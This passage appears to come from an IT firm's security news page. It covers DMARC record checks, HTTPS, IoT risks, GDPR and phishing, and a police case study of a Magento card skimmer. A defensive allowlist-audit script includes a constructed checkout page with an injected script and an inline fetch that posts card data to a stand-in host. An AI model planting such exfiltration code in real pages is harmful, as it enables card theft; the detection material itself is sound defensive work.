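    # v=DMARC1 must be the first tag, exactly; otherwise receivers ignore the record.
    if record.strip().split(";")[0].strip() != "v=DMARC1":
        return "invalid", ["record must begin with v=DMARC1"]
    tags = parse_dmarc(record)
    if "p" not in tags:
        return "invalid", ["mandatory p= tag missing"]
    policy = tags["p"].lower()
    if policy not in ("none", "quarantine", "reject"):
        return "invalid", [f"unknown policy {policy!r}"]
    try:
        pct = int(tags.get("pct", "100"))
    except ValueError:
        return "invalid", ["pct= must be an integer"]
    if policy == "none":
        return "monitor-only", ["p=none: spoofed mail is delivered, only reported"]

    notes: list[str] = []
    subdomain_policy = tags.get("sp", policy).lower()  # sp defaults to p
    if policy == "quarantine":
        notes.append("p=quarantine: spoofed mail goes to spam rather than being rejected")
    if pct < 100:
        notes.append(f"pct={pct}: only {pct}% of failing mail has the policy applied")
    if subdomain_policy == "none":
        notes.append("sp=none: subdomains of your domain can still be spoofed")
    level = "partial" if notes else "enforced"
    if "rua" not in tags:
        notes.append("no rua= address: you will not receive aggregate reports")
    return level, notes


# Constructed sample records.
MONITOR_ONLY = "v=DMARC1; p=none; rua=mailto:dmarc-reports@example.test"
ENFORCED = "v=DMARC1; p=reject; sp=reject; pct=100; rua=mailto:dmarc-reports@example.test"

if __name__ == "__main__":
    for record in (None, MONITOR_ONLY, ENFORCED):
        print(record, "->", assess_dmarc(record))
```

    DMARC only protects mail that claims to come from your own domain. A lookalike domain the criminal has registered, such as those in the university example above, passes DMARC checks for that domain perfectly well, which is why the verification steps in points 3 and 4 remain necessary even once your own record reads p=reject.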

  • IS YOUR WEBSITE SECURE?

    With the release of Chrome 68 this week, Google is taking further steps to make the web safer and is marking all websites that are not HTTPS as ‘Not Secure’.

    With an HTTP site there is no SSL certificate to encrypt your connection to the web server, therefore anything sent over an HTTP connection is in plain text. Passwords, names, addresses, personal and bank details etc. are not encrypted, giving an attacker the opportunity to intercept this information.

    So, if your website is still running as HTTP, any of your visitors that are using Google Chrome will be warned with a ‘Not Secure’ message when visiting your website.

    By upgrading to HTTPS you also get the added benefit of Google algorithms favouring your website so that your Google ranking will be higher!

    If you need more information please give us a call on 01460 271055

  • INTERNET OF THINGS (IOT) SECURITY

    IoT devices are any physical devices that are able to connect to and communicate over the internet. This connectivity allows new opportunities for cyber criminals.

    IoT devices such as cameras, home sensors, and even baby monitors have become hugely popular. Unfortunately, security has been an afterthought for many manufacturers and consumers. Here are some threats related to IoT devices that you should be aware of.

    Insufficient authentication
    Weak passwords, and a lack of two-factor authentication on many devices, can make it easy for an attacker to gain access to your devices.

    Lack of Encryption
    Unencrypted data, possibly even passwords being sent over the air with no protection (a recent story involved IoT lightbulbs doing just this between each other).

    Physical Security
    Are cameras showing weak points? Employee screens? Stock levels? An attacker could leverage this for malicious purposes.

    Insecure software / hardware / firmware
    Some devices are unable to receive updates with security patches, or it may be that manufacturers simply do not release updates. This is a huge vulnerability. Similarly, if device credentials are hard-coded (i.e. unable to be changed), then once these are exposed it becomes much easier for an attacker to compromise that device, as well as potentially other devices on that network.

    Insecure Networks
    Do you have ports open that shouldn't be? Could the device be compromised to conduct DDoS attacks?

  • STIMULATE THE MIDDLE AGED

    As many organisations want to support mobile, team-oriented and non-routine ways of working, an increasing number of them are looking for assistance in adopting digital workplace technology. A recent Gartner, Inc. survey concluded that only 7 percent to 18 percent of organisations possess the digital dexterity to adopt new ways of work (NWOW) solutions, such as virtual collaboration and mobile working.

    Not surprisingly, they found that the youngest age group (18-24) are the most likely adopters of NWOW, closely followed by the oldest (55-74). The group at the low point of the adoption dip (35-44) is potentially feeling fatigued with the routines of life as middle age approaches. They were the most likely to report that their jobs are routine, had the dimmest view of how technology can help their work, and were the least interested in mobile work.

  • COOL - I.T.

    It seems that the days of snow are finally behind us and that big golden thing in the sky has made an appearance.

    It’s time to enjoy the warmer temperatures but have you thought about the effect that the temperature has on your IT Equipment?

    You may have seen a temperature warning like this on your phone or tablet from time to time, and you should always take measures to cool the device as soon as possible.

    If you are out in the sun, get it into the shade and allow it to cool, as extended periods of heat can cause faster deterioration of the internal components and shorten the life of the battery. Mobile devices should be kept between 0°C and 35°C.

    In your server room you run similar risks as extended periods of heat give you a much higher risk of system failure and downtime.

    A server should be kept running at between 20°C and 24°C, and dangerous temperatures are classed as anything higher than 30°C.

    If your server room is beyond this limit installation of an air conditioning unit should be considered.

    With a Blueloop Packaged Services Agreement we can monitor the temperature for you and take appropriate and safe shut-down action in extreme cases.

  • DATA BREACH

    A data breach means a breach of security leading to the accidental or unlawful destruction, loss, alteration, unauthorised disclosure of, or access to, data.

    The reported number and scale of data breaches has continued to increase, with Dixons Carphone and PageUp as recent examples of larger organisations being exposed. Associated threats are many, including the potential for various frauds using the actual data gained from the breach, or exploiting the media awareness around the breach (e.g. phishing/vishing/smishing attempts from attackers masquerading as employees of the affected company, or as regulatory authorities).

    If an organisation suffers a data breach, then the consequences can be dire. Financial damages can now include hefty fines from the ICO for non-compliance, and the reputational damage can be incredibly difficult to recover from.

    The techniques used in many cases are often not particularly advanced. Examples include exploiting unpatched vulnerabilities or spear-phishing, and a large number of incidents have been caused by third-party suppliers failing to secure data properly. This highlights the importance of getting basic technical and procedural security measures right.

  • CASE STUDY

    A major hardware distributor was the victim of a network intrusion whereby suspects had gained access to the backend of their .eu and .ie domains, through a vulnerability in the company’s webserver. It is believed that the suspect identified the type of webserver which the domains were hosted on using security scanning software tools such as Nmap or Metasploit. Once the type of webserver had been identified, the criminals would have ascertained that the company used the Magento ecommerce payment platform, which is used to manage their online financial transactions. Unfortunately, the Magento software which they used was vulnerable to cross-site scripting (XSS), an attack type which we discuss below. This particular vulnerability had been present for over 6 months, and had not been patched.
     
    XSS is a code injection attack whereby an attacker can inject malicious scripts (payloads) into a legitimate website or web application, which are then executed by an end user. The XSS would have given the suspect(s) access to the backend of their .ie and .eu domains, and from there the suspects brute-forced an old admin account which had lain dormant for 2 years. This would have been relatively easy to do, as the account had a weak password.
     
    Once customers reached the Magento payment section, a JavaScript file was triggered and the customer was presented with a ‘fake credentials payment section’, which looked identical to the correct payment section. The aim of the script was to fraudulently obtain the credit card details entered by customers. The compromised details were then sent in clear text to another domain. Interestingly, the payment type used determined whether the code was successful or not. For example, it was successful for debit cards but not PayPal – this was primarily down to poorly written code.
     
    In total, 138 customers were affected with compromised banking details, which were used in secondary fraud. The investigation identified the route of compromise and also a number of IP addresses, with the suspects using multiple VPN companies to remotely access the victim’s network.
     
    The investigation team was able to trace the malicious file back to a server in Eastern Europe; the suspects had contacted the hosting company using encrypted instant messaging and made payment through the cryptocurrency Bitcoin (BTC).
     
    Through extensive open source enquiries and engagement with international law enforcement partners, we were able to identify details of the organised crime group behind the attacks and provided this intelligence to overseas law enforcement for them to develop further and take proactive action against the suspect(s) identified. This investigation highlights the effective intelligence sharing between international agencies to tackle cyber crime on a global scale.
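    The skimmer in this case study worked by loading a script and posting card details to a domain the shop did not own. The check below is an added example, not the investigation team's tooling or Magento code: it parses a checkout page and flags every script source, form action or URL inside inline JavaScript whose host is not on the shop's own allowlist, so that periodic monitoring of the payment page catches an injected exfiltration destination. The sample page and the hostnames in it are constructed.

```python
# Added example (not from the case study or Magento): flag script/form destinations outside the shop's allowlist.
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[^\s'\"()<>]+")

class PageAudit(HTMLParser):
    def __init__(self):
        super().__init__()
        self.urls = []  # (context, url) pairs found in the page
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self._in_script = True
            if a.get("src"):
                self.urls.append(("script-src", a["src"]))
        elif tag == "form" and a.get("action"):
            self.urls.append(("form-action", a["action"]))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:  # inline JS: any absolute URL is a potential exfil target
            self.urls.extend(("inline-js", u) for u in URL_RE.findall(data))

def find_unexpected_hosts(html, allowed_hosts):
    """Return sorted (context, host) pairs whose host is not on the allowlist."""
    p = PageAudit()
    p.feed(html)
    found = set()
    for ctx, url in p.urls:
        host = urlparse(url).hostname
        if host and host.lower() not in allowed_hosts:  # relative URLs are same-origin
            found.add((ctx, host.lower()))
    return sorted(found)

# Constructed sample: legitimate assets plus one injected script and an off-site form
SAMPLE_PAGE = """<html><body>
<script src="/static/js/checkout.js"></script>
<script src="https://cdn.shop.example/mage/payment.js"></script>
<script src="https://stats-collect.example.net/p.js"></script>
<form action="https://card-verify.example.org/submit" method="post"></form>
<script>fetch("https://stats-collect.example.net/c", {method: "POST", body: cc});</script>
</body></html>"""
ALLOWED = {"shop.example", "cdn.shop.example"}
```

    Run against the served checkout page on a schedule and alert on any non-empty result; a new host appearing in the list is exactly what the dormant-account compromise above would have produced.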

  • Implementation and Preparation

    ITIL (formerly an acronym for Information Technology Infrastructure Library) is a set of detailed practices for IT service management (ITSM) that focuses on aligning IT services with the needs of business.  This process is adopted here at Blueloop for our customers.

    Recent publicity regarding poorly implemented system upgrades for the banking industry clearly demonstrates that upgrades and system improvements need to be well planned and tested in a live ‘pilot’ before implementation. Using ITIL’s industry standard for both IT project delivery and IT support provides suitable controls and measures for organisations in a professional and efficient manner.

    Why risk business disruption when there are industry tools for IT service to protect your business?

  • SUPPLY CHAIN ATTACK

    A type of attack where security flaws or vulnerabilities are introduced into equipment, hardware, software, or services before they are supplied to, or used by, a target.

    Supply chain attacks can be used for a number of purposes, including breaching confidential data, stealing login credentials for further attacks, or even supplying defective equipment to prevent a service from being useable (a denial of service).

    One example saw attackers compromise legitimate websites through website builders used by creative and digital agencies. The criminals utilised a redirect script to send people to a malicious domain they owned, where malware was downloaded and installed by users who were browsing legitimate websites.

    Ongoing servicing, support, or updates may provide criminals with an opportunity to interfere with a supply chain.

  • Your Data Matters

    GDPR: how was it for you? Did the sky fall in?

     

    After the email bombardment and mixed messages that we have all experienced about GDPR, it’s time to take a step back and reflect on a very sensible campaign that the Information Commissioner’s Office (ICO) has launched, called “Your Data Matters”.

    Their brief is a very straightforward one: “increase public trust and confidence in the way personal data is handled”. This comes at a time when our confidence in how this data is handled is at a low ebb, with a recent Direct Marketing Association (DMA) study showing that 86% of consumers would like more control over how their data is held and processed.

    The ICO campaign has cross-industry support from companies such as PwC, Sainsbury’s, and the BBC.

     

    Find out about your personal data rights and how to find advice concerning its use by third-parties by visiting https://ico.org.uk/your-data-matters/

    Five minutes well spent.

  • Backups+

    Organisations consider data management and security to be a simple nightly backup but Veeam believe there are 5 steps to data security nirvana and traditional backup is just the first.

    • Backup: back up all workloads and ensure recoverability from data loss or attack.
    • Aggregation: manage data backup and recoverability across multiple environments with an aggregated view of SLA compliance.
    • Visibility: deliver monitoring, resource optimisation, capacity planning, and built-in intelligence to improve multi-environment data management.
    • Orchestration: move data to the best location across multiple environments to ensure business continuity, compliance, security, and optimal use of resources, with an orchestration engine that enables disaster recovery (DR) plans to be automatically and non-disruptively executed, tested, and documented.
    • Automation: Veeam's idea of nirvana, in which data becomes self-managing via data analysis, pattern recognition, and machine learning, and so is automatically backed up, migrated to ideal locations, secured during anomalous activity, and recovered instantaneously.

    We are not at the Automation stage yet but it's good to set our sights high.

    Blueloop work with Veeam to provide resilient data and system management solutions.

  • Cyber Intelligence Report

    SOUTH WEST POLICE

    Regional Crime Unit

     

    Spear Phishing

    A form of phishing where a specific person is deliberately targeted with an email typically containing personal information, purporting to be from a reputable source.

    Spear phishing emails have the same end goal in mind as regular phishing attacks: they are designed to make a potential victim interact with the email in some way, usually by clicking on a link or opening an attachment. However, they are generally much more difficult to recognise, as the authors include highly relevant information which adds legitimacy to the correspondence.

    As an example, criminals often masquerade as vendors and email financial workers with attached invoices relating to recent orders that a company may have placed. Once the attachment is opened, malicious code is executed which can trigger various actions - such as stealing passwords, running cryptojacking software, or taking command of a computer to use in a future botnet for a DDoS attack.

    For more information, see https://www.swrocu.org.uk/cyber.aspx

  • A Question of GDPR

    The aim of the GDPR is to protect all EU citizens from privacy and data breaches in an increasingly data-driven world that is vastly different from the time in which the 1995 directive was established.

    Although the key principles of data privacy still hold true to the previous directive, many changes have been proposed to the regulatory policies; the key points of the GDPR as well as information on the impacts it will have on business can be found below.
